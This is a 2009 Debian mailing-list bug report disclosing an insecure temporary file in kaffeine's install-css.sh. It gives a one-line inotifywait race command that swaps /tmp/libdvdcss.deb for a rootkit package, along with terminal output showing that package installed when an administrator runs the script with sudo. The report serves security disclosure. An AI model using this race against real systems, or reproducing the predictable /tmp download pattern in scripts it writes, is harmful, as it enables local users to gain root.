[Pkg-kde-extras] Bug#554772: install-css.sh: insecure temporary file /tmp/libdvdcss.deb
Timo Juhani Lindfors
timo.lindfors at iki.fi
Fri Nov 6 12:09:54 UTC 2009
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security
Steps to reproduce:
1) Malice starts the following command in the background with the
privileges of her normal user account:
sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &
2) Malice calls the local administrator Trent and complains that she
can't watch DVDs.
3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs
sudo bash /usr/share/doc/kaffeine/install-css.sh
Expected results:
3) Code to decrypt DVDs is installed.
Actual results:
3) Due to insecure use of temporary files in install-css.sh Malice's
rootkit.deb is installed:
$ sudo bash /usr/share/doc/kaffeine/install-css.sh
--2009-11-06 13:54:46-- http://www.dtek.chalmers.se/groups/dvd/deb/libdvdcss2_1.2.5-1_amd64.deb
Resolving www.dtek.chalmers.se... 129.16.30.198
Connecting to www.dtek.chalmers.se|129.16.30.198|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'
100%[=====================================>] 26,176 --.-K/s in 0.03s
2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]
(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...
-- System Information:
Debian Release: 5.0.3
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash
Versions of packages kaffeine depends on:
ii hdparm 8.9-3 tune hard disk parameters for high
ii kdelibs4c2a 4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii libc6 2.7-18 GNU C Library: Shared libraries
ii libcdparanoia0 3.10.2+debian-5 audio extraction tool for sampling
ii libgcc1 1:4.3.2-1.1 GCC support library
ii libogg0 1.1.3-4 Ogg Bitstream Library
ii libqt3-mt 3:3.3.8b-5 Qt GUI Library (Threaded runtime v
ii libstdc++6 4.3.2-1.1 The GNU Standard C++ Library v3
ii libvorbis0a 1.2.0.dfsg-3.1 The Vorbis General Audio Compressi
ii libvorbisenc2 1.2.0.dfsg-3.1 The Vorbis General Audio Compressi
ii libx11-6 2:1.1.5-2 X11 client-side library
ii libxcb1 1.1-1.2 X C Binding
ii libxext6 2:1.0.4-1 X11 miscellaneous extension librar
ii libxine1 1.1.14-6 the xine video/media player librar
ii libxine1-ffmpeg 1.1.14-6 MPEG-related plugins for libxine1
ii libxine1-x 1.1.14-6 X desktop video output plugins for
ii libxinerama1 2:1.0.3-2 X11 Xinerama extension library
ii libxtst6 2:1.0.3-1 X11 Testing -- Resource extension
kaffeine recommends no packages.
kaffeine suggests no packages.
-- no debconf information
More information about the pkg-kde-extras
mailing list